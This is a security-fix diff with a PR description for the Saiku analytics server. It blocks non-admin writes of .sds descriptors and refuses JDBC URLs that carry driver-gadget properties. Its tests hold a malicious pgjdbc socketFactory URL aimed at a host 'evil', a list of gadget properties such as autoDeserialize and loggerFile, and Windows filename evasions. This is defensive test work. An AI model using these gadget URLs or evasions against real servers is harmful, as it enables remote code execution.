+                "jdbc:mondrian:Jdbc=jdbc:mysql://h/db;Catalog=mondrian://Foodmart;JdbcDrivers=com.mysql.cj.jdbc.Driver");
+    }
+
     private static void assertRejected(String url) {
         try {
             JdbcUrlValidator.validate(url);

--- a/saiku-core/saiku-web/src/test/java/org/saiku/web/rest/resources/BasicRepositoryResource2DatasourceWriteTest.java
+++ b/saiku-core/saiku-web/src/test/java/org/saiku/web/rest/resources/BasicRepositoryResource2DatasourceWriteTest.java
@@ -1,0 +1,255 @@
+/*
+ *   Copyright 2026 Spicule Ltd
+ *   Apache License, Version 2.0.
+ */
+package org.saiku.web.rest.resources;
+
+import static org.junit.Assert.assertEquals;
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assert.assertTrue;
+
+import jakarta.servlet.http.HttpServletRequest;
+import jakarta.ws.rs.core.Response;
+import java.util.ArrayList;
+import java.util.Collections;
+import java.util.List;
+import java.util.Map;
+import org.junit.After;
+import org.junit.Before;
+import org.junit.Test;
+import org.saiku.service.ISessionService;
+import org.saiku.service.datasource.DatasourceService;
+import org.saiku.service.user.UserService;
+import org.springframework.security.authentication.UsernamePasswordAuthenticationToken;
+import org.springframework.security.core.GrantedAuthority;
+import org.springframework.security.core.authority.SimpleGrantedAuthority;
+import org.springframework.security.core.context.SecurityContextHolder;
+
+/**
+ * saiku#1903 — call-site coverage for the write half of the datasource RCE chain. A ROLE_USER
+ * could POST an {@code .sds} descriptor to {@code /repository/resource} (into their own home, or
+ * the then world-writable {@code /datasources}) and have {@code /discover/refresh} connect its
+ * JDBC URL. The resource now refuses descriptor writes from non-admins with a 403 before the
+ * service layer is touched; admins and ordinary files are unaffected.
+ */
+public class BasicRepositoryResource2DatasourceWriteTest {
+
+    private static final String PG_GADGET_SDS = "<dataSource><location>jdbc:postgresql://evil/db"
+            + "?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext</location></dataSource>";
+
+    private BasicRepositoryResource2 resource;
+    private RecordingDatasourceService files;
+    private UserService users;
+
+    @Before
+    public void setUp() {
+        files = new RecordingDatasourceService();
+        users = new UserService();
+        users.setAdminRoles(Collections.singletonList("ROLE_ADMIN"));
+        resource = new BasicRepositoryResource2();
+        resource.setDatasourceService(files);
+        resource.setSessionService(new StubSessionService("bob"));
+        resource.setUserService(users);
+    }
+
+    @After
+    public void clearSecurityContext() {
+        SecurityContextHolder.clearContext();
+    }
+
+    /* ---------------------------------------------------------------- saveResource */
+
+    @Test
+    public void nonAdmin_cannotSaveSdsIntoOwnHome() {
+        loginAs("bob", "ROLE_USER");
+        Response r = resource.saveResource("/homes/bob/evil.sds", PG_GADGET_SDS);
+        assertEquals(403, r.getStatus());
+        assertEquals("the service layer must not be reached", 0, files.saves);
+        assertTrue(String.valueOf(r.getEntity()).contains("administrator"));
+    }
+
+    @Test
+    public void nonAdmin_cannotSaveSdsWithUppercaseExtension() {
+        loginAs("bob", "ROLE_USER");
+        assertEquals(
+                403, resource.saveResource("/homes/bob/evil.SDS", PG_GADGET_SDS).getStatus());
+        assertEquals(0, files.saves);
+    }
+
+    @Test
+    public void nonAdmin_cannotSaveAnythingUnderDatasources() {
+        loginAs("bob", "ROLE_USER");
+        assertEquals(
+                403,
+                resource.saveResource("/datasources/schema.xml", "<Schema/>").getStatus());
+        assertEquals(
+                403,
+                resource.saveResource("datasources/schema.xml", "<Schema/>").getStatus());
+        assertEquals(
+                403,
+                resource.saveResource("\\datasources\\schema.xml", "<Schema/>").getStatus());
+        assertEquals(0, files.saves);
+    }
+
+    @Test
+    public void nonAdmin_canStillSaveOrdinaryFiles() {
+        loginAs("bob", "ROLE_USER");
+        Response r = resource.saveResource("/homes/bob/report.saiku", "{}");
+        assertEquals(200, r.getStatus());
+        assertEquals(1, files.saves);
+        assertEquals("/homes/bob/report.saiku", files.lastSavePath);
+        // A name that merely CONTAINS the word is not a descriptor.
+        assertEquals(
+                200,
+                resource.saveResource("/homes/bob/my-datasources-notes.txt", "x")
+                        .getStatus());
+        assertEquals(2, files.saves);
+    }
+
+    @Test
+    public void admin_canSaveSds() {
+        loginAs("root", "ROLE_USER", "ROLE_ADMIN");
+        Response r = resource.saveResource("/datasources/warehouse.sds", "<dataSource/>");
+        assertEquals(200, r.getStatus());
+        assertEquals(1, files.saves);
+        assertEquals("/datasources/warehouse.sds", files.lastSavePath);
+    }
+
+    @Test
+    public void unauthenticatedCaller_isNotAdmin() {
+        // No authentication at all: fail closed (SessionRoles yields no roles, isAdmin() is false).
+        assertEquals(
+                403, resource.saveResource("/homes/bob/evil.sds", PG_GADGET_SDS).getStatus());
+        assertEquals(0, files.saves);
+    }
+
+    /* ---------------------------------------------------------------- moveResource */
+
+    @Test
+    public void nonAdmin_cannotRenameIntoSds() {
+        loginAs("bob", "ROLE_USER");
+        Response r = resource.moveResource("/homes/bob/innocent.txt", "/homes/bob/evil.sds");
+        assertEquals(403, r.getStatus());
+        assertEquals(0, files.moves);
+    }
+
+    @Test
+    public void nonAdmin_cannotMoveIntoDatasources() {
+        loginAs("bob", "ROLE_USER");
+        assertEquals(
+                403,
+                resource.moveResource("/homes/bob/x.xml", "/datasources/x.xml").getStatus());
+        assertEquals(0, files.moves);
+    }
+
+    @Test
+    public void nonAdmin_canStillMoveOrdinaryFiles() {
+        loginAs("bob", "ROLE_USER");
+        assertEquals(
+                200,
+                resource.moveResource("/homes/bob/a.saiku", "/homes/bob/b.saiku")
+                        .getStatus());
+        assertEquals(1, files.moves);
+    }
+
+    @Test
+    public void admin_canMoveSds() {
+        loginAs("root", "ROLE_ADMIN");
+        assertEquals(
+                200,
+                resource.moveResource("/datasources/a.sds", "/datasources/b.sds")
+                        .getStatus());
+        assertEquals(1, files.moves);
+    }
+
+    /* ---------------------------------------------------------------- fallback without a UserService */
+
+    @Test
+    public void withoutUserService_fallsBackToRoleAdminAuthority() {
+        resource.setUserService(null);
+        loginAs("bob", "ROLE_USER");
+        assertEquals(
+                403, resource.saveResource("/homes/bob/evil.sds", PG_GADGET_SDS).getStatus());
+        assertEquals(0, files.saves);
+
+        loginAs("root", "ROLE_ADMIN");
+        assertEquals(
+                200,
+                resource.saveResource("/datasources/ok.sds", "<dataSource/>").getStatus());
+        assertEquals(1, files.saves);
+    }
+
+    @Test
+    public void descriptorPathPredicate() {
+        assertTrue(BasicRepositoryResource2.isDatasourceDescriptorPath("/homes/bob/x.sds"));
+        assertTrue(BasicRepositoryResource2.isDatasourceDescriptorPath("x.SDS"));
+        assertTrue(BasicRepositoryResource2.isDatasourceDescriptorPath("./datasources/x.xml"));
+        assertTrue(BasicRepositoryResource2.isDatasourceDescriptorPath("/tenant/datasources/x.xml"));
+        assertFalse(BasicRepositoryResource2.isDatasourceDescriptorPath("/homes/bob/x.sds.bak"));
+        assertFalse(BasicRepositoryResource2.isDatasourceDescriptorPath("/homes/bob/report.saiku"));
+        assertFalse(BasicRepositoryResource2.isDatasourceDescriptorPath(null));
+    }
+
+    /* ---------------------------------------------------------------- fixtures */
+
+    private static void loginAs(String user, String... roles) {
+        List<GrantedAuthority> authorities = new ArrayList<>();
+        for (String r : roles) {
+            authorities.add(new SimpleGrantedAuthority(r));
+        }
+        SecurityContextHolder.getContext()
+                .setAuthentication(new UsernamePasswordAuthenticationToken(user, "pw", authorities));
+    }
+
+    /** Records what reaches the service layer; never touches a filesystem. */
+    static final class RecordingDatasourceService extends DatasourceService {
+        int saves;
+        String lastSavePath;
+        int moves;
+
+        @Override
+        public String saveFile(String content, String path, String name, List<String> roles) {
+            saves++;
+            lastSavePath = path;
+            return "Save Okay";
+        }
+
+        @Override
+        public String moveFile(String source, String target, String name, List<String> roles) {
+            moves++;
+            return "Move Okay";
+        }
+    }
+
+    static final class StubSessionService implements ISessionService {
+        private final String username;
+
+        StubSessionService(String username) {
+            this.username = username;
+        }
+
+        @Override
+        public Map<String, Object> login(HttpServletRequest req, String username, String password) {
+            return Collections.emptyMap();
+        }
+
+        @Override
+        public void logout(HttpServletRequest req) {}
+
+        @Override
+        public void authenticate(HttpServletRequest req, String username, String password) {}
+
+        @Override
+        public Map<String, Object> getSession() {
+            return getAllSessionObjects();
+        }
+
+        @Override
+        public Map<String, Object> getAllSessionObjects() {
+            return Collections.singletonMap("username", username);
+        }
+
+        @Override
+        public void clearSessions(HttpServletRequest req, String username, String password) {}
+    }
+}

--- a/saiku-core/saiku-web/src/test/java/org/saiku/web/rest/resources/BasicRepositoryResource2DatasourceWriteTest.java
+++ b/saiku-core/saiku-web/src/test/java/org/saiku/web/rest/resources/BasicRepositoryResource2DatasourceWriteTest.java
@@ -77,6 +77,27 @@ public class BasicRepositoryResource2DatasourceWriteTest {
     }
 
     @Test
+    public void nonAdmin_cannotSaveSdsWithWindowsFilenameEvasion() {
+        // saiku#1903 SEC follow-up: Win32 drops trailing dots/spaces and NTFS ADS suffixes, so
+        // each of these lands on disk as evil.sds. All must 403.
+        loginAs("bob", "ROLE_USER");
+        assertEquals(
+                403,
+                resource.saveResource("/homes/bob/evil.sds.", PG_GADGET_SDS).getStatus());
+        assertEquals(
+                403,
+                resource.saveResource("/homes/bob/evil.sds ", PG_GADGET_SDS).getStatus());
+        assertEquals(
+                403,
+                resource.saveResource("/homes/bob/EVIL.SDS.", PG_GADGET_SDS).getStatus());
+        assertEquals(
+                403,
+                resource.saveResource("/homes/bob/evil.sds::$DATA", PG_GADGET_SDS)
+                        .getStatus());
+        assertEquals(0, files.saves);
+    }
+
+    @Test
     public void nonAdmin_cannotSaveAnythingUnderDatasources() {
         loginAs("bob", "ROLE_USER");
         assertEquals(
@@ -188,6 +209,12 @@ public class BasicRepositoryResource2DatasourceWriteTest {
         assertFalse(BasicRepositoryResource2.isDatasourceDescriptorPath("/homes/bob/x.sds.bak"));
         assertFalse(BasicRepositoryResource2.isDatasourceDescriptorPath("/homes/bob/report.saiku"));
         assertFalse(BasicRepositoryResource2.isDatasourceDescriptorPath(null));
+        // Windows filename-normalisation evasions (saiku#1903 SEC follow-up).
+        assertTrue(BasicRepositoryResource2.isDatasourceDescriptorPath("/homes/bob/evil.sds."));
+        assertTrue(BasicRepositoryResource2.isDatasourceDescriptorPath("/homes/bob/evil.sds "));
+        assertTrue(BasicRepositoryResource2.isDatasourceDescriptorPath("/homes/bob/EVIL.SDS."));
+        assertTrue(BasicRepositoryResource2.isDatasourceDescriptorPath("/homes/bob/evil.sds::$DATA"));
+        assertTrue(BasicRepositoryResource2.isDatasourceDescriptorPath("/homes/bob/evil.sds:stream"));
     }
 
     /* ---------------------------------------------------------------- fixtures */

--- a/saiku-proptest/src/test/java/org/saiku/proptest/JdbcUrlValidatorPropertyTest.java
+++ b/saiku-proptest/src/test/java/org/saiku/proptest/JdbcUrlValidatorPropertyTest.java
@@ -17,9 +17,11 @@ import org.saiku.web.rest.objects.JdbcUrlValidator;
 /**
  * Property-based tests for the security-critical {@link JdbcUrlValidator}, which blocks the H2
  * "executable JDBC URL" RCE class ({@code INIT=RUNSCRIPT}, {@code CREATE ALIAS/TRIGGER},
- * {@code SHUTDOWN}). Example-based tests check a handful of hand-picked strings; these properties
- * assert the security invariant holds across a generated space of URLs — including nesting and
- * casing an attacker would actually try.
+ * {@code SHUTDOWN}) and — since saiku#1902, by delegating to the service-layer
+ * {@code JdbcUrlPolicy} — the non-H2 driver-gadget families and unknown schemes. Example-based
+ * tests check a handful of hand-picked strings; these properties assert the security invariant
+ * holds across a generated space of URLs — including nesting and casing an attacker would actually
+ * try.
  */
 class JdbcUrlValidatorPropertyTest {
 
@@ -72,5 +74,52 @@ class JdbcUrlValidatorPropertyTest {
         String url = scheme + name;
 
         assertDoesNotThrow(() -> JdbcUrlValidator.validate(url));
+    }
+
+    /**
+     * saiku#1902: driver-gadget connection properties — the class-loading / deserialisation /
+     * local-file families (pgjdbc socketFactory, Connector/J autoDeserialize, ...) — in the
+     * spellings a driver would still honour: mixed case, separator noise, percent-encoding.
+     */
+    private static final List<String> GADGET_PROPERTIES = List.of(
+            "socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext",
+            "SOCKETFACTORY=x.Y",
+            "socket_factory=x.Y",
+            "socket%46actory=x.Y",
+            "sslfactory=x.Y",
+            "autoDeserialize=true",
+            "auto_deserialize=true",
+            "allowLoadLocalInfile=true",
+            "queryInterceptors=x.Y",
+            "loggerFile=/var/www/x.jsp",
+            "accessTokenCallbackClass=x.Y");
+
+    private static final List<String> PROPERTY_SEPARATORS = List.of("?", ";", "&");
+
+    /** A gadget property is refused on EVERY backend, whatever the database name or separator. */
+    @HegelTest
+    void rejectsDriverGadgetPropertiesOnEveryBackend(TestCase tc) {
+        String scheme = tc.draw(sampledFrom(SAFE_SCHEMES), "scheme");
+        String name = tc.draw(fromRegex("[a-z][a-z0-9_]{0,20}"), "name");
+        String separator = tc.draw(sampledFrom(PROPERTY_SEPARATORS), "separator");
+        String gadget = tc.draw(sampledFrom(GADGET_PROPERTIES), "gadget");
+
+        String url = scheme + name + separator + gadget;
+
+        assertThrows(IllegalArgumentException.class, () -> JdbcUrlValidator.validate(url));
+    }
+
+    /**
+     * A JDBC sub-scheme outside the allow-list is refused whatever follows it. The generated
+     * scheme is prefixed {@code zz} so it can never collide with a real, allowed driver.
+     */
+    @HegelTest
+    void rejectsUnknownSchemes(TestCase tc) {
+        String scheme = tc.draw(fromRegex("zz[a-z0-9]{1,8}"), "scheme");
+        String rest = tc.draw(fromRegex("[a-z][a-z0-9_/]{0,20}"), "rest");
+
+        String url = "jdbc:" + scheme + "://" + rest;
+
+        assertThrows(IllegalArgumentException.class, () -> JdbcUrlValidator.validate(url));
     }
 }

--- a/saiku-webapp/src/main/webapp/WEB-INF/saiku-beans.xml
+++ b/saiku-webapp/src/main/webapp/WEB-INF/saiku-beans.xml
@@ -741,6 +741,8 @@
         <aop:scoped-proxy/>
         <property name="sessionService" ref="sessionService"/>
         <property name="datasourceService" ref="datasourceServiceBean"/>
+        <!-- saiku#1903: admin check for datasource-descriptor (.sds / /datasources) writes. -->
+        <property name="userService" ref="userServiceBean"/>
     </bean>
 
     <!-- Dashboards CRUD (org.saiku.web.rest.resources.dashboards.DashboardResource


### PR DESCRIPTION
## Summary
Closes the authenticated-user RCE chain found in the security review — **#1902 + #1903 + #1904** in one fix. Any logged-in `ROLE_USER` (no admin) could write a datasource `.sds` file (to their own home or the world-writable `/datasources`), trigger `/discover/refresh`, and have the loader open a JDBC connection to an attacker-controlled URL whose driver property instantiates an arbitrary class (pgjdbc `socketFactory`/CVE-2022-21724 family, MySQL `autoDeserialize`, etc.) — remote code execution on the stock JRE image, no admin, no `javac`.

## The change
- **New `JdbcUrlPolicy` (saiku-service), enforced at the connection chokepoint** — every `DriverManager`/`Class.forName` site that takes descriptor-controlled input now validates first, so it doesn't matter which path produced the URL (admin add, `.sds` file-load on boot/refresh, Ossie, cube-designer, schemagen). Scheme allow-list + connection-property deny-list (class-loading / deserialisation / local-file / JNDI families, matched after percent-decoding and key-noise stripping, catching host-list and comma-delimited forms) + H2 executable tokens + recursive Mondrian-wrapper validation. Drivers are loaded **without static-init**, checked to be a `java.sql.Driver`, then initialised.
- **ACL default → READ** (`Acl2`): a PUBLIC/uncased node was world-writable (`default: WRITE`); `/datasources` is now seeded SECURED (admin-only).
- **Non-admin `.sds` write block** (`FilesystemRepositoryManager` + `BasicRepositoryResource2`), Windows-filename-normalised (trailing dot/space, NTFS ADS) so it can't be evaded.
- `/discover/refresh` is deliberately **left ungated** — the UI polls it every 3s; the chokepoint removes the RCE regardless.
- Also fixes an unescaped JSON interpolation in the Ossie Calcite model build (a `"` in a warehouse URL/name could inject a second schema).

## Verified
- New wiring tests prove a gadget URL is refused **before any driver is consulted** at the real `SaikuOlapConnection` call site (`connectCalls == 0` on reject, `== 1` on the permitted path), and that a malicious `.sds` on disk is discovered by the loader yet never connected.
- Bypass coverage: MySQL host-list `(host=…,socketFactory=…)`, `address=(…)`, Teradata comma form, double-percent-encoding, Windows `evil.sds.`/trailing-space/`::$DATA`, Mondrian `DynamicSchemaProcessor=` — all rejected by test.
- No false positives: Postgres/MySQL SSL, `mysql+srv`, MariaDB, SQL Server, Oracle, Hive, Snowflake key-pair, BigQuery `OAuthPvtKeyPath`, ClickHouse, DuckDB, HSQLDB, the Trino lakehouse `.sds`, XMLA, and the FoodMart H2 seed all still pass.
- Suites: **saiku-service 1628/0 (+1 skip), saiku-web 837/0**; **launcher integration tests 121/0 — FoodMart connects end-to-end**.

## Test plan
- CI runs the full JDK-22 build + failsafe ITs on this PR.
- Optional manual smoke: register an ordinary Postgres/H2 datasource in the UI → still connects; a datasource whose URL carries `socketFactory=` is refused.

## Notes
- **saiku-cloud:** the `.sds` write-block lives in the filesystem repo, which the Postgres-backed cloud repo doesn't run — but the connection chokepoint (bypass-free) is the backstop there, so a cloud tenant still can't connect a malicious URL. Defense-in-depth holds.
- Residuals left for follow-up (all admin-only): Mondrian `JdbcDrivers=`/`CatalogContent=` class-loading (admin-authored), XMLA `Server=` SSRF, embedded-DB file paths not confined to the datadir. Extend the scheme allow-list with `-Dsaiku.jdbc.allowedSchemes=`.

Closes #1902
Closes #1903
Closes #1904
